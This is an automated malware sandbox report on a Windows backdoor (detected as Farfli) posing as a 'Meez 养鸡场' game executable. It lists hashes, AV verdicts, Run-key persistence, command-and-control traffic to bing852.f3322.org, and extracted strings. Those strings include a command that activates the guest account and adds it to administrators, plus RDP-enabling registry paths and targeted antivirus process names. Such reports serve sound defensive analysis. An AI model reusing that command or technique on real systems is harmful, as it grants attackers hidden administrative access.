Analysis Date: 2015-01-17 00:48:38
MD5: 6e845933d12845543ac26f76def9c134
SHA1: 5385e9ebaa72dfe5c7d686cc59ef9886d7eca307

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 408c6b5554f81726850ec3036ce12631 sha1: 7f7404bc269c19af7af794993f5d1004c826c8a1 size: 217088
Section .rdata md5: 005bf0b4910e15acfb1ee29fe516226a sha1: d95f424b46cc52c994dcbd329262a254cf2cfbd6 size: 16384
Section .data md5: 8cc51e7b23126d5176a931e099a55faa sha1: 699c63c04a2e513502a14bad5cc6482fc683d045 size: 8192
Section .idata md5: 75bcbfe60272448e1523b58690b370b5 sha1: 29164290b67600ec02eee7285b60ba0f940f85ef size: 8192
Section .rsrc md5: eb4ef82a01a1750dc8c4f0bf58f42a07 sha1: c1f6534782b83dc4410d3ae4c73483752a084156 size: 45056
Section .reloc md5: db9b3f9dbe8010d2ab13788f444cd7b6 sha1: 476308e072143bc1dcee1f49979c11d860fdc915 size: 8192
Timestamp: 2014-01-15 12:39:35
Pdb path: @
Version:
LegalCopyright: 版权所有(C) 2014
InternalName: 养鸡场
FileVersion: 1, 0, 0, 1
CompanyName: Meez
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: Meez 养鸡场
SpecialBuild:
ProductVersion: 1, 0, 0, 1
FileDescription: 养鸡场
OriginalFilename: 养鸡场.exe
Packer: Microsoft Visual C++ v6.0
PEhash: f6fdaafcbe6806a9d2d5db07921dc691bdf622f6
IMPhash: 29aa249fa0ff3ca2f03b829c4a3d4675
AV 360 Safe: no_virus
AV Ad-Aware: Generic.Malware.SP!VPkg.12A98305
AV Alwil (avast): Farfli-BD [Trj]
AV Arcabit (arcavir): Generic.Malware.SP!VPkg.12A98305
AV Authentium: W32/KillAV.AU.gen!Eldorado
AV Avira (antivir): BDS/Backdoor.A.2103
AV BullGuard: Generic.Malware.SP!VPkg.12A98305
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Agen.r6
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader9.21367
AV Emsisoft: Generic.Malware.SP!VPkg.12A98305
AV Eset (nod32): Win32/Farfli.ADG
AV Fortinet: W32/Dialer.ASVR!tr
AV Frisk (f-prot): W32/KillAV.AU.gen!Eldorado
AV F-Secure: Generic.Malware.SP!VPkg.12A98305
AV Grisoft (avg): BackDoor.Generic_r.FLT
AV Ikarus: Backdoor.Win32.Farfli
AV K7: no_virus
AV Kaspersky: Trojan.Win32.Agent.aegqp
AV MalwareBytes: no_virus
AV Mcafee: no_virus
AV Microsoft Security Essentials: Trojan:Win32/Beaugrit.gen!AAA
AV MicroWorld (escan): Generic.Malware.SP!VPkg.12A98305
AV Rising: Backdoor.Farfli!4858
AV Sophos: Mal/Behav-027
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): BScope.P2P-Worm.Palevo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\V587\\xd3\\xd0\\xc4\\xda\\xba\\xad ➝ C:\malware.exe\\x00
Creates File: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\guanxige.exe
Creates File: \Device\Afd\Endpoint
Creates Mutex: bing852.f3322.org

Network Details:

DNS: bing852.f3322.org
Type: A
59.188.4.101
Flows TCP: 192.168.1.1:1031 ➝ 59.188.4.101:5555
Flows TCP: 192.168.1.1:1032 ➝ 59.188.4.101:5555
Flows TCP: 192.168.1.1:1033 ➝ 59.188.4.101:5555
Flows TCP: 192.168.1.1:1034 ➝ 59.188.4.101:5555
Flows TCP: 192.168.1.1:1035 ➝ 59.188.4.101:5555
Flows TCP: 192.168.1.1:1036 ➝ 59.188.4.101:5555

Raw Pcap
0x00000000 (00000)   41314345 41                           A1CEA

0x00000000 (00000)   41314345 41                           A1CEA

0x00000000 (00000)   41314345 410101                       A1CEA..

0x00000000 (00000)   41314345 410101                       A1CEA..

0x00000000 (00000)   41314345 410101                       A1CEA..

0x00000000 (00000)   41314345 410101                       A1CEA..


Strings
VirtualAlloc
VirtualAlloc
A1CEA
ConvertSidToStringSidA
CreateDirectoryA
\
WinSta0\Default
g%s\*.*
hh
%s\*.*
ijpp
WinSta0\Default
WinSta0\Default
WinSta0\Default
REG_SZ
%-24s %-15s %s 
n
RegCreateKeyExA
CreatePipe
GetSystemDirectoryA
\cmd.exe
CreateProcessA
.
TerminateThread
TerminateProcess
WaitForSingleObject
DisconnectNamedPipe
Sleep
PeekNamedPipe
ReadFile
TerminateThread
TerminateProcess
WaitForMultipleObjects
USER32.dll
wsprintfA
fKERNEL32.dll
GetSystemInfo
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.
[Z
NOD32
avast..
F-Secure..
F-Secure..
Q
Active
Connected
ConnectQuery
Shadow
Disconnected
Idle
Listen
Reset
Down
Init
RS
/P
SAM\SAM\Domains\Account\Users\
MNSAM\SAM\Domains\Account\Users\Names\
KL
JIJ
KGSYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server
PortNumber
fDenyTSConnections
net user guest /active:yes && net user guest 123456 && net localgroup administrators guest /add
pOpkernel32.dll
FreeLibrary
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Policies\Microsoft\Windows\Installer
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SYSTEM\CurrentControlSet\Services\TermDD
SYSTEM\CurrentControlSet\Services\TermService
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
SYSTEM\CurrentControlSet\Services\TermService\Parameters
SYSTEM\CurrentControlSet\Control\Terminal Server
ShutdownWithoutLogon
EnableAdminTSRemote
KeepRASConnections
Start
TSEnabled
EnableConcurrentSessions
ServiceDll
TermService
fDenyTSConnections
:\
SYSTEM\CurrentControlSet\Services\TermService\Parameters
.
}
~Process32Next
SetEvent
CreateEventA
WaitForSingleObject
Process32First
explorer.exe
GetCurrentThreadId
GetCurrentThreadId
GetCurrentThreadId
Winlogon
.
.

080404b0
1, 0, 0, 1
(C) 2014
Comments
CompanyName
.exe
FileDescription
FileVersion
InternalName
jjjj
jjjjj
jjjjjj
jjjjjjj
LegalCopyright
LegalTrademarks
Meez
Meez 
OriginalFilename
PrivateBuild
ProductName
ProductVersion
SpecialBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
<$<.<;<|<
>">&>*>
                                        
								
00000%s
0!0&0,030h0m0s0z0
0$0)030c0t0y0
"0(0.040:0@0F0L0R0X0
0!0/0c0q0
0 0<0P0l0
0 051;1B1o1{1
0,090Z0_0y0
0@0W0~0
0#10151B1Y1f1}1T2Y2_2f2
010J0j0
;0,161L1g1t1
~0<1F1d1n1
>$>*>0>6><>B>H>N>T>Z>`>f>l>r>x>~>
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
=0C0J0W0v0
:0;D;_;
=0=L=`=h=|=
?0?L?`?h?
>0>L>T>h>
>0>:>T>y>
0y1!2h2r2
1$1*101:1?1c1j1q1x1~1
1 1$1(1,1014181<1@1
1 1'141F1>2T2c2m2
1 1'1V1
1+1A1J1m1s1
1#1S1d1i1s1
127.0.0.1
1'282E2
1-2F2R2
1 585H5
1(6@6T6d6h6
:1:9:?:N:j:t:{:
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
;1;D;I;Q;W;a;p;
;1;H;o;
>1?>?P?
??1type_info@@UAE@XZ
2008R2
2%2,232:2A2H2O2V2]2d2k2r2y2
2:2^2n2
2;2f2l2w2
2>2W2h2
2$3*303B3H3N3T3Z3`3f3l3r3x3~3
2`3B4O4
242>2H2v2
%-24s %-15s 
%-24s %-15s 0x%x(%d) 
253;3B3o3{3
253<3R3a3k3{3
>%>+>2>7>>>G>N>U>b>t>=?
=->2>8>?>
< <&<,<2<8<><D<J<P<V<\<b<h<n<t<z<
2C2T2Y2c2
??2@YAPAXI@Z
;;;2}}}z
3&303:3D3N3X3b3l3v3
3'3,323=3J3]3b3h3s3
3#3)343:3E4
333D3I3S3
360sd.exe
360tray.exe
>	>.>3>9>@>W>
=&=3=^=c=i=p=t>
>3>D>I>S>
;);3;E;L;\;l;
??3@YAXPAX@Z
42474=4D4
{4_^]3
4&404C4T4m4z4
4$4,41474>4
4-4]4{4
4 4&4,42484>4D4J4P4V4\4b4h4
4$4(4,4x4
4/4=4B4L4v4
4)464C4P4
4(494C4
>#?4?9?C?s?
="=(=.=4=:=@=F=L=R=X=^=d=j=p=v=|=
4I5[5h576r6
:4Y4f4j5#626
505N5S5Y5`5
5#5*575I5V5c5a6j6p6x6~6
555&:::::::B999G888>999/
5&6T6Z6F7t7z7f8
:5:I:_:
<$<)</<6<
61767<7C7
6 6$6(6,6064686<6$7
6"6L6Z6_6i6
6"7'717[7l7q7{7
6A7F7L7S7f7
:6:A:S:Y:
6D7H7L7P7T7X7\7`7d7h7
6h7m7$8)8}8
<6=o=~=
6Q6W6^6
>6>U>[>x>~>
708l8y8
7%727u7
7$7,9q9
7!8%8)8-8
7<8P8W8
7*9/959<9A9f9
7j7p7w7
=*>7>[>o>
:';7;P;i;
7P:Y:b:j:t:~:
868D8I8S8}8
8#808=8J8O8
8(808`8t8
8]8E9R9g9{9
8#9(9.959l9
8BBBgeee
:8:K:W:j:q:
<)<.<8<_<m<r<|<
;$;8;T;h;
:$:8:T:h:
9#989@9E9K9V9[9a9.:
9(9D9L9T9\9l9
9.9D9n9
9!9P9V:[:
9(9R9`9e9o9
9A:F:P:z:
9=:B:H:O:y:
9M:R:X:_:
;$;9;M;W;^;c;i;p;
>	?9?Q?a?q?
9_|t93
~(9~$u
a2guard.exe
***$AAA=VVVSWWW`VVVbWWWZJJJI4441
AbortSystemShutdownA
_acmdln
Active
AddAccessAllowedAce
_adjust_fdiv
AdjustTokenPrivileges
advapi32.dll
ADVAPI32.dll
ad-watch.exe
AllocateAndInitializeSid
Application
\Application Data\Microsoft\Netw
Applications\iexplore.exe\shell\open\command
ArcaTasksService.exe
ArcaVir
ashserv.exe
a-squared
AvastSvc.exe
avgnt.exe
avgwdsvc.exe
avp.exe
.?AVtype_info@@
AVWatchService.exe
>(?A?y?
AYAgent.aye
Aypcrtsl
bad Allocate
bad buffer
_beginthreadex
bing852.f3322.org
{bJQE[m
BKavService.exe
buffer error
calloc
CancelIo
ccSetMgr.exe
ccSvcHst.exe
C:\Documents and Settings\All Users\
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\guanxige.exe
cfp.exe
CharNextA
: ;&;-;C;H;N;U;
CKSoftShiedAntivirus4.exe
cleaner8.exe
ClearEventLogA
CloseDesktop
CloseEventLog
CloseHandle
CloseServiceHandle
CMCTrayIcon.exe
COMODO
CONNECT 
Console
_controlfp
ControlService
CopyFileA
Coranti2012
CorantiControlCenter32.exe
C:\progra~1\Common Files\svcchost.exe
CreateEventA
CreateFileA
CreateMutexA
CreateProcessA
CreateRemoteThread
CreateThread
CreateToolhelp32Snapshot
CRIPTION\Sys
csrss.exe
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
ctions\pbk\rasphone.pbk
=C=T=Y=c=
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\guanxige.exe
__CxxFrameHandler
_CxxThrowException
D0f041S1u1
D$(8D*
@.data
data error
%dDay %dHour %dMin
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
DeleteCriticalSection
DeleteFileA
DeleteService
Device
DialParamsUID
Disable
;D<J<S<Y<`<j<
__dllonexit
Documents an
drwtsn32.exe
;D$<s!
d Settings\
D$$SUV
egui.exe
}EhphC
empty distance tree with lengths
EnterCriticalSection
EnumProcessModules
EnumWindows
_errno
_except_handler3
\Exit 2014
ExitProcess
ExitWindowsEx
fDenyTSConnections
Fdf+Fh
file error
FindClose
Find CPU infomation error
FindFirstFileA
FindNextFileA
<F=L=S=
FortiTray.exe
F-PROT
F-PROT.EXE
FreeLibrary
FreeSid
fsav32.exe
fsavgui.exe
ger Error!
GetCurrentProcess
GetDiskFreeSpaceExA
GetDriveTypeA
GetFileAttributesA
GetFileSize
GetIfTable
GetLastError
GetLengthSid
GetLogicalDriveStringsA
__getmainargs
GetModuleFileNameA
GetModuleFileNameExA
GetModuleHandleA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetSystemDirectoryA
GetThreadDesktop
GetTickCount
GetTokenInformation
GetUserNameA
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GetWindowTextA
GetWindowThreadProcessId
GlobalMemoryStatusEx
\guanxige.exe
<H1>403 Forbidden</H1>
HARDWARE\DES
HARDWARE\DESCRIPTION\System\CentralProcessor\0
HeapAlloc
HeapFree
|$HPWS
<H<\<p<x<
HrCg@b	g(
http://
HTTP/1.0 200 OK
Http/1.1 403 Forbidden
? ?H?Y?c?
:	;I;b;Z<(=G=l=
.idata
Immunet
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
_initterm
insufficient memory
InterlockedExchange
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
InternetReadFile
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid stored block lengths
invalid window size
iphlpapi.dll
iptray.exe
IsValidSid
IsWindowVisible
=-===J=v=
;j;Z>J?y?
K7TSecurity.exe
kernel32.dll
KERNEL32.dll
knsdtray.exe
KSafeTray.EXE
KvMonXP.exe
kxetray.exe
Lavasoft
LeaveCriticalSection
lla/4.0 (compatible)
L$LQVS
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
L$,QWV
L$_RasDefaultCredentials#0
L$ RUPj
LsaClose
LsaFreeMemory
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyW
lstrlenA
malloc
_mbscmp
_mbsstr
mbstowcs
Mcshield.exe
memcmp
memcpy
memmove
memset
Microsoft\Network\Conne
Module32First
Module32Next
Mongoosa
MongoosaGUI.exe
MoveFileA
MsMpEng.exe
mssecess.exe
MSVCP60.dll
MSVCRT.dll
MultiByteToWideChar
n\ca`ZW&5
need dictionary
NETAPI32.dll
NetApiBufferFree
NetLocalGroupAddMembers
NetUserAdd
NetUserDel
NetUserEnum
NetUserGetInfo
NetUserGetLocalGroups
NetUserSetInfo
Norton
nProtect
nsocket-di:%d
nspupsvc.exe
o0s0w0{0
;%;O;];b;l;
_onexit
OpenDesktopA
OpenEventA
OpenEventLogA
OpenInputDesktop
OpenProcess
OpenProcessToken
OpenSCMana
OpenSCManagerA
OpenServiceA
OpenService Error!
OpenWindowStationA
ork\Connections\pbk\rasphone.pbk
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
?,???O?Y?c?
pA^PB6:=T
patray.exe
__p__commode
PCSHELL UP
__p__fmode
PhoneNumber
PortNumber
PostMessageA
Process32First
Process32Next
ProcessorNameString
przEO:>
PSafeSysTray.exe
PSAPI.DLL
pSVWhhsC
<p<u<{<
="=(=/=p>v>}>
QQPCTray.exe
QueryServiceStatus
QueryServiceStatus Error!
QUHLPSVC.EXE
QUICK HEAL
RasDialParams!%s#0
RavMonD.exe
`.rdata
RDP-Tcp
ReadFile
realloc
REG_BINARY
RegCloseKey
RegDeleteKeyA
RegDeleteValueA
REG_DWORD
RegEnumKeyExA
RegEnumValueA
REG_EXPAND_SZ
REG_MULTI_SZ
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegSetKeySecurity
RegSetValueExA
@.reloc
RemoveDirectoryA
remupd.exe
rename
ResetEvent
rhgghp
_RichV:
rpAT?9<T
<?=S=2>C>P>
SAM\SAM\Domains\Account\Users\Names\%s
SavProgress.exe
SBAMSvc.exe
%s:\Documents and Settings\Local User
Security
SeDebugPrivilege
SendMessageA
\Server\svchost\Release\yjc2014.pdb
ServiceDll
SeShutdownPrivilege
__set_app_type
SetErrorMode
SetEvent
SetFilePointer
SetProcessWindowStation
SetSecurityDescriptorDacl
SetThreadDesktop
__setusermatherr
sharedaccess
SHDeleteKeyA
SHELL32.dll
SHGetFileInfoA
SHGetSpecialFolderPathA
Shield Antivirus
shlwapi.dll
_snprintf
Sophos
sprintf
SpywareTerminator
SpywareTerminatorShield.exe
%s%s*.*
%s\shell\open\command
%s%s%s
StartServiceA
strcat
strchr
strcmp
strcpy
stream end
stream error
strlen
strncat
strncmp
strncpy
_strnicmp
strrchr
_strrev
strstr
strtok
_strupr
@SVW_^[
SVWhTbC
SVWhXhC
System
SYSTEM\CurrentControlSe
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
SYSTEM\CurrentControlSet\Services\
%SystemRoot%\system32\termsrv_t.dll
T+3x%A
T$DPVS
tem\CentralProcessor\0
TerminateProcess
TerminateThread
TermService
\termsrv.dll
termsrv_t
\termsrv_t.dll
= =T=f=w=L>
=T>h>|>
The Cleaner
!This program cannot be run in DOS mode.
t<h|sC
T$LPQR
T$LRWS
TMBMSRV.exe
TmProxy.exe
too many length or distance symbols
T$,PQh
T$(PQR
T$,RWV
t\Services\BITS
tZ9H tU9H$tP
U2a2p2
unknown compression method
UnThreat
UnThreat.exe
USER32.dll
uu8TAX
uy_eUNME
V3Svc.exe
vba32lder.exe
VirtualAllocEx
VirtualFree
VIRUSfighter
vsserv.exe
W(9W$u
WaitForSingleObject
wcscpy
wcslen
wcstombs
WideCharToMultiByte
Windows %s SP%d
WinExec
WININET.dll
winsta0
Win XP
WriteFile
WriteProcessMemory
WS2_32.dll
WSAIoctl
wsprintfA
WTSAPI32.dll
WTSDisconnectSession
WTSEnumerateSessionsA
WTSFreeMemory
WTSLogoffSession
WTSQuerySessionInformationA
WTSQuerySessionInformationW
|$ WUSV
_XcptFilter
xSVWj2
YdLKH~